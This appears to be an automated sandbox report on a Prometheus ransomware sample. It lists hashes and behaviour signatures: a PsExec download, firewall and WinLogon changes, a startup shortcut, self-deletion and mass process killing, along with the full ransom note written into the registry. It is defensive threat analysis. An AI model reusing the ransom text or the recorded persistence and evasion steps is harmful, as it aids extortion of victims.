Malware Analysis Report

2024-10-19 06:16

Sample ID 210528-w5abwajf3x
Target 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample
SHA256 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc
Tags
prometheus evasion persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc

Threat Level: Known bad

The file 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample was found to be: Known bad.

Malicious Activity Summary

prometheus evasion persistence ransomware

Prometheus Ransomware

Downloads MZ/PE file

Downloads PsExec from SysInternals website

Modifies extensions of user files

Modifies Windows Firewall

Drops startup file

Deletes itself

Modifies WinLogon

Launches sc.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Runs ping.exe

System policy modification

Modifies Internet Explorer settings

Kills process with taskkill

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-30 11:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-05-28 09:36

Reported

2021-05-28 09:38

Platform

win7v20210410

Max time kernel

51s

Max time network

48s

Command Line

"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe"

Signatures

Prometheus Ransomware

ransomware prometheus

Downloads MZ/PE file

Downloads PsExec from SysInternals website

Description Indicator Process Target
HTTP URL http://live.sysinternals.com/PsExec64.exe N/A N/A

Modifies Windows Firewall

evasion

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Launches sc.exe

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 788 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\reg.exe
PID 788 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\reg.exe
PID 788 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\reg.exe
PID 788 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\reg.exe
PID 788 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\reg.exe
PID 788 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\reg.exe
PID 788 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\schtasks.exe
PID 788 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\schtasks.exe
PID 788 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\schtasks.exe
PID 788 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\netsh.exe
PID 788 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\netsh.exe
PID 788 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\netsh.exe
PID 788 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 272 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 272 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 272 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\sc.exe
PID 788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
